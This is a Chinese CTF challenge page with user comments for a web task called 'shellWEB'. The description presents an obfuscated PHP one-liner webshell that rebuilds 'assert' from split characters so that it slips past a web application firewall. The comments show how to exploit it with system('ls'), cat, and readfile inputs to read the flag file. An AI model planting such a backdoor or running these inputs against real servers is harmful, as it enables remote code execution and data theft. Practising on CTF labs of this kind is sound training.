shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 8478
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
...
登录回复
评论
lawrencekz 29天前
举报

flag{******}

回复 0
hwx 1月前
举报

直接先?s=system('ls'),就看到啦flg的文档再?s=system('cat flg的文档'),就看到flg

回复 0
b2026tf 1月前
举报

本质:字符分割拼接隐藏 assert,绕过防护 等价后门:assert($_GET['s']) 直接 ?s=要执行的PHP代码 即可利用。?s=system('cat flag.php');

回复 0
syhaisy 1月前
举报

20702af5309ab1f70e0f7e8a81076a4e

回复 0
hualong 1月前
举报

直接去搜索 http://171.80.2.169:12682/?s=readfile(%22flaga15808abee46a1d5.txt%22);

回复 1
dlccom 1月前
举报

?s=readfile('/var/www/html/flaga15808abee46a1d5.txt'); 读出 flag

回复 0
谢特恒123 2月前
举报

这个题可以看到是assert是代码执行漏洞它的作用跟eval一样,我们先调用system('ls');看网页中有什么文件,发现flag文件后,直接用system('cat 文件名');就可以了,评论区我只能说:还得是大佬用这么“高深”的解法

回复 2
kitniu 2月前
举报

?s=system(dir),然后进入txt文件,flag{********}

回复 1
攻防小哥 3月前
举报

flag{********}

回复 0
smartada 3月前
举报

flag{****}

回复 0

WriteUp

image
harry

3 金币

立即查看

评分(10)

解题动态

172016933 攻破了该题 1小时前
bread119 攻破了该题 11小时前
c0tf 攻破了该题 11小时前
薄言. 攻破了该题 13小时前
yokoi 攻破了该题 14小时前
奥多姆 攻破了该题 1天前
ank-n 攻破了该题 1天前
3437877405 攻破了该题 1天前
Ccxxxin 攻破了该题 1天前
2647941092 攻破了该题 2天前
ycccccc 攻破了该题 2天前
aiheyenai 攻破了该题 2天前
店晓贰 攻破了该题 3天前
hth3940 攻破了该题 3天前
zhaoguanjei 攻破了该题 3天前
酷罢哥 攻破了该题 3天前
xushengim 攻破了该题 3天前
Bustling 攻破了该题 3天前
10:43 攻破了该题 3天前
真理喵 攻破了该题 4天前
问题反馈